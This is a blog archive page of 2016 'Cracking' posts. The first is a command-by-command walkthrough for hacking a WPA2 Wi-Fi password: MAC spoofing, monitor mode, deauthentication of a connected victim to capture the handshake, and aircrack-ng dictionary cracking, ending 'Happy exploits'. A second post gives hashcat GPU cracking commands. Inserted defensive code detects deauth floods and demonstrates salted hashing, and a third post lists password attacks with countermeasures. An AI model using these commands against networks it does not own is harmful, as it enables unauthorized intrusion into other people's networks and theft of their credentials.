Showing posts with label Cracking.

Wednesday, 27 April 2016

How do I hack a WPA2 Wi-Fi password using Backtrack 2016?

Backtrack is now Kali Linux; download it when you get some free time.

Pre-Requisites:
  1. Kali / BackTrack Linux, which by default has all the tools required to do what you want.
  2. A virtual machine or a laptop you can use to boot BT or Kali.
  3. A compatible network card. The card should support packet injection if you want to do this quickly; otherwise you will have to wait for someone to disconnect and reconnect to the access point.

Important Terms To Know:

MAC Address (Media Access Control Address) is a unique identifier assigned to network interfaces for communications on the physical network segment.

WAP (Wireless Access Point) is a device that allows wireless devices to connect to a wired network using Wi-Fi.

BSSID (Basic Service Set Identifier) is the MAC address of the WAP.

ESSID (Extended Service Set Identifier) is the display name of the wireless network.

WPA/WPA2 (Wi-Fi Protected Access / Wi-Fi Protected Access II) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks.

PSK (Pre-Shared Key) is the term for the password defined in WPA/WPA2 encrypted networks.


STEP 1: Changing Your MAC Address:
  1. In Kali/BT open the terminal.
  2. Command: ifconfig
  3. This lists all network adapters on your system, including your wireless one, which will be named something like wlanX (wlan0, wlan1, ...).
  4. Turn off your network card using the command: ifconfig wlan0 down
    Note: change wlan0 to whatever the previous command showed.
  5. Command: macchanger -m 00:11:22:33:44:55
    This temporarily changes the MAC address of your device.
  6. Turn the device back on: ifconfig wlan0 up

STEP 2: Create a virtual monitoring interface.
In order to listen to the signals that wlan0 is handling, we will create a virtual interface that lets us monitor what wlan0 is sending and receiving.

  1. Command: airmon-ng start wlan0
  2. This creates a new monitor interface called mon0 (use whatever name airmon-ng prints; newer releases name it wlan0mon).

STEP 3: Start the attack by monitoring the wireless traffic

  1. Command: airodump-ng mon0
    This lists all active APs with their BSSID and other details. Below that list you will see the stations (computers) connected to any of these APs.
  2. Note down the BSSID and the channel (CH in the output) of the AP you want to hit.
  3. Hit Ctrl+C to end the monitoring.


STEP 4: Lock onto the needed AP.
This targets the communication from just the access point you want and starts writing the collected information to a file that you will crack later.

What we are hoping to capture is the 4-way handshake that the systems use to authenticate; this data can then be used to crack the password.

  1. Command: airodump-ng --bssid <bssid of AP> -c 4 -w dumpfilename mon0
    Replace <bssid of AP> and the channel number (4 here) with the data you noted in step 3; dumpfilename can be replaced with anything.
  2. This starts monitoring the access point and also shows the stations connected to it. Write down the BSSID of any one of the stations so that you can trick it into disconnecting and reconnecting.

STEP 5: Capturing Authentication Packets
Note: This only works if your network card supports packet injection; otherwise you will have to wait until the person disconnects and reconnects by themselves.

  1. Open a new terminal and give the command:
    aireplay-ng -0 30 -a <BSSID of Station Connected> mon0
    This sends 30 disconnect requests to the computer, causing it to try to reconnect to the access point.
  2. If it shows an error or does not seem to work, it is probably an issue with the network card and you will need to wait until the user reconnects by themselves.
  3. Once the reconnection happens you will see it in the airodump-ng terminal that is monitoring the packets; an alert should be shown in the top right corner.
    Hit Ctrl+C and exit it. Time to crack the password.

STEP 6: Cracking the password
  1. You need a password list file, which can be downloaded from the internet. Just search for "wordlist" or "password list"; you can get files with millions of words, some as big as 1GB to 10GB. The more words in it, the better.
  2. Get and extract the wordlist file to your home folder.
  3. Run the command:
    aircrack-ng -w wordlist.lst -b <AP BSSID> dumpfilename*.cap
  4. Replace the part in angle brackets with the right details.

STEP 7: Wait

  1. Wait some time while your computer does the dirty work of cracking the password. You should have the password on your screen soon.


Happy exploits.
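Step 5 relies on a burst of spoofed deauthentication frames. As an added example, not part of the original post, this is the defender's view: a detector that flags a source sending a burst of deauth/disassoc frames to one station inside a short window, run over a constructed list of decoded 802.11 frames. The frame tuples, MAC addresses, window and threshold are constructed for the demo; real input would come from a monitor interface or a WIDS.

```python
from collections import defaultdict, deque

AP = "AA:BB:CC:DD:EE:01"       # constructed access point BSSID
STA = "11:22:33:44:55:66"      # constructed client station MAC

# Constructed sample of decoded 802.11 frames: (time_seconds, subtype, source, destination).
# The single deauth at t=0.5 is ordinary housekeeping; the 30 frames from t=5.0
# mimic the forced-reconnect burst described in step 5.
SAMPLE_FRAMES = [
    (0.00, "beacon", AP, "FF:FF:FF:FF:FF:FF"),
    (0.10, "data", STA, AP),
    (0.50, "deauth", AP, STA),
    (0.90, "data", AP, STA),
] + [(5.0 + i * 0.01, "deauth", AP, STA) for i in range(30)]


def detect_deauth_floods(frames, window_s=2.0, threshold=10):
    """Return one alert per (source, destination) pair that sends at least
    `threshold` deauth/disassoc frames within any `window_s` second window."""
    recent = defaultdict(deque)   # (src, dst) -> timestamps still inside the window
    alerts, alerted = [], set()
    for t, subtype, src, dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in ("deauth", "disassoc"):
            continue
        key = (src, dst)
        q = recent[key]
        q.append(t)
        while q and t - q[0] > window_s:   # slide the window forward
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": src, "dst": dst, "start": q[0], "count": len(q)})
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"deauth flood: {a['src']} -> {a['dst']} from t={a['start']}s ({a['count']} frames)")
```

Enabling 802.11w (Protected Management Frames) on the access point removes this vector, since stations then reject unauthenticated deauth frames.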

Tuesday, 26 April 2016

Cracking a WPA Capture with the GPU using HashCat Part 7 - Backtrack


Cracking a WPA Capture with the GPU using HashCat
After a WPA/WPA2 handshake capture has been saved to a drive, cracking it with the CPU alone can take a long time. To speed this process up, the GPU in some video cards can be used.

This can speed things up drastically when brute-forcing a WPA data capture.

You will need to know which video card you are using and look it up to see whether it is supported.

In the instructions before this, aircrack-ng was used to show how to crack a WPA capture with a dictionary.

In this example a tool called oclHashCat will be used in order to utilize a video card's GPU.

A dictionary file and the data capture are still needed; the difference is that the video card's GPU does the work. Always check that your card is supported and the correct drivers are loaded.

Nvidia and AMD/ATI video cards use two separate hashcat binaries.

The two main versions of HashCat are:
oclHashCat for AMD/ATI graphics cards
cudaHashCat for Nvidia graphics cards

You can download both from here http://hashcat.net/files/oclHashcat-plus-0.14.7z

Extract it with 7z x oclHashcat-plus-0.14.7z (don't use 7z e, as it will not preserve the directory structure).

To use hashcat, the .cap file needs to be converted to a .hccap file; to do this use aircrack-ng.

aircrack-ng <out.cap> -J <out.hccap>

Run hashcat against your new capture file using the correct version.

cudaHashcat-plus32.bin -m 2500 <filename>.hccap <wordlist>



Tuesday, 19 April 2016

6 Most Common Password Cracking Methods And Their Countermeasures- Hacking

6 methods used to crack passwords
There are a number of methods out there used by hackers to hack your account or get your personal information. In this post I will share the 6 most commonly used methods to crack passwords and their countermeasures. Read this article to stay safe and to protect your online accounts from being hacked.

1. Brute-Force Attack

Any password can be cracked using a brute-force attack. Brute-force attacks try every possible combination of numbers, letters and special characters until the right password is matched. Brute-force attacks can take a very long time depending on the complexity of the password; the cracking time is determined by the speed of the computer and the length and complexity of the password.

Countermeasure: Use long and complex passwords. Use a combination of upper- and lowercase letters along with numbers. A brute-force attack will take hundreds or even thousands of years to crack such complex and long passwords.
Example: Passwords like "iloveu" or "password" can be cracked easily, whereas a computer will take years to crack passwords like "aN34lL00".


2. Social Engineering

Social engineering is the process of manipulating someone into trusting you and giving you information. For example, if the hacker was trying to get the password of a co-worker's or friend's computer, he could call pretending to be from the IT department and simply ask for the login details. Sometimes hackers call the victim pretending to be from the bank and ask for their credit card details. Social engineering can be used to get someone's password, bank credentials or any personal information.

Countermeasure: If someone tries to get your personal or bank details, ask them a few questions and make sure the caller is legitimate. Never give your credit card details over the phone.

3. RATs and Keyloggers

In keylogging or RATing the hacker sends a keylogger or RAT (remote access trojan) to the victim. This allows the hacker to monitor everything the victim does on their computer; every keystroke is logged, including passwords. Moreover, the hacker can even control the victim's computer.

Countermeasure: Never log in to your bank account from a cyber cafe or someone else's computer. If it is important, use an on-screen or virtual keyboard while typing the login. Use the latest anti-virus software and keep it updated. Check out the article below to learn more about RATs and keyloggers.

4. Phishing

Phishing is the easiest and most popular method used by hackers to get someone's account details. In a phishing attack the hacker sends the victim a fake copy of a real website's login page, such as Facebook or Gmail. When someone logs in through that fake page, their details are sent to the hacker. These fake pages can be easily created and hosted on free web-hosting sites.

Countermeasure: Phishing attacks are easy to avoid. The URL of a phishing page is different from the real one. For example, the URL of a phishing page for Facebook might look like facbbook.com (note the two "b"s). Always make sure the website's URL is correct. Check out the article below to learn more about phishing.

5. Rainbow Table

A rainbow table is a huge pre-computed table of hashes for every possible combination of characters up to some length. A password hash is a password that has been passed through a mathematical algorithm such as MD5 and transformed into something unrecognizable. A hash is a one-way function, so once a password is hashed there is no direct way to get the original string back from the hash. A very commonly used hashing algorithm for storing passwords in website databases is MD5. A rainbow table attack is similar to a dictionary attack; the difference is that the hashes of the candidate passwords are computed in advance and simply looked up, rather than computed for each guess at cracking time.

Example: 'hello' in MD5 is 5d41402abc4b2a76b9719d911017c592 and the zero-length string ("") is d41d8cd98f00b204e9800998ecf8427e

Countermeasure: Make sure you choose a password that is long and complex. Creating tables for long and complex passwords takes a very long time and a lot of resources.
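Added example, not from the original post: a tiny unsalted-MD5 lookup table built from a constructed wordlist recovers the page's 'hello' hash in one lookup, while a salted MD5 and a slow PBKDF2 hash of the same password are not in the table at all, which is why per-user salts and a slow KDF (not only a longer password) are the server-side countermeasure. WORDLIST, SALT and the function names are constructed for this demonstration.

```python
import hashlib

# Constructed wordlist standing in for a downloaded password list (example only).
WORDLIST = ["password", "iloveu", "hello", "123456", "letmein", ""]

# Constructed fixed salt so the demo is reproducible; real systems draw it from os.urandom.
SALT = b"constructed-salt"


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def build_lookup_table(words):
    """Precompute unsalted MD5 for every candidate: a toy stand-in for a rainbow table."""
    return {md5_hex(w.encode()): w for w in words}


def lookup(table, digest):
    """Recover a password in one dictionary lookup if its unsalted hash was precomputed."""
    return table.get(digest)


def salted_md5(password: str, salt: bytes) -> str:
    # A per-user salt makes the same password hash differently for every user,
    # so a single precomputed table no longer covers anyone.
    return md5_hex(salt + password.encode())


def pbkdf2_sha256(password: str, salt: bytes, iterations: int = 100_000) -> str:
    # Slow, salted KDF: every guess now costs `iterations` rounds instead of one MD5.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def demo():
    table = build_lookup_table(WORDLIST)
    return {
        "unsalted_hit": lookup(table, md5_hex(b"hello")),              # 'hello'
        "empty_hit": lookup(table, md5_hex(b"")),                      # ''
        "salted_hit": lookup(table, salted_md5("hello", SALT)),        # None
        "pbkdf2_hit": lookup(table, pbkdf2_sha256("hello", SALT)),     # None
    }


if __name__ == "__main__":
    print(demo())
```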

6. Guessing

This seems silly, but it can get someone's password within seconds. If the hacker knows you, they can use what they know about you to guess your password. Hackers can also combine social engineering and guessing to acquire your password.

Countermeasure: Don't use your name, surname, phone number or birthdate as your password. Avoid creating a password that relates to you. Create a long, complex password with a combination of letters and numbers.